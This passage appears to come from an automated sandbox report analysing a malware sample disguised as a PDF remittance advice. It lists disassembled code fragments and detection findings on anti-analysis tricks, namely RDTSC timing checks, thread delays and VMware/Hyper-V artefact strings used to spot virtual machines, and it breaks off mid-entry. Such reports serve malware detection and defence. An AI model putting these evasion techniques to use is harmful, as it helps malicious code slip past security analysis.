          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EAF7E8 push 00430408h; ret 0_3_03EAF80C
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93790 push 0041442Ch; ret 0_3_03E93830
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA8728 push 00429348h; ret 0_3_03EA874C
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB0700 push 00431320h; ret 0_3_03EB0724
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93718 push 00414382h; ret 0_3_03E93786
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93716 push 00414382h; ret 0_3_03E93786
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E866E0 push ecx; mov dword ptr [esp], eax0_3_03E866E1
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E826C0 push eax; ret 0_3_03E826FC
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA86C0 push 004292F2h; ret 0_3_03EA86F6
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA76D8 push 004282F8h; ret 0_3_03EA76FC
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA96D4 push 0042A300h; ret 0_3_03EA9704
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA7698 push 004282B8h; ret 0_3_03EA76BC
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB066C push 00431298h; ret 0_3_03EB069C
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E88674 push ecx; mov dword ptr [esp], eax0_3_03E88675
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB05D0 push 0043121Dh; ret 0_3_03EB0621
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EAA528 push 0042B16Bh; ret 0_3_03EAA56F
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D4A0 push 0040E103h; ret 0_3_03E8D507
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E88484 push ecx; mov dword ptr [esp], eax0_3_03E88485
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D49E push 0040E103h; ret 0_3_03E8D507
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E85BF8 push 00406818h; ret 0_3_03E85C1C
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA9BA4 push 0042A7C4h; ret 0_3_03EA9BC8
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA6B3C push 0042775Ch; ret 0_3_03EA6B60
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E85B08 push 00406728h; ret 0_3_03E85B2C
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E95B18 push ecx; mov dword ptr [esp], edx0_3_03E95B1D
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E9DA4C push 0041E6D0h; ret 0_3_03E9DAD4
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 00000000104183C4 second address: 00000000104183CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 000000001041875E second address: 0000000010418764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000027083C4 second address: 00000000027083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000270875E second address: 0000000002708764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04976DE6 rdtsc 13_2_04976DE6
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000E.00000000.462518967.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000E.00000000.462518967.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmp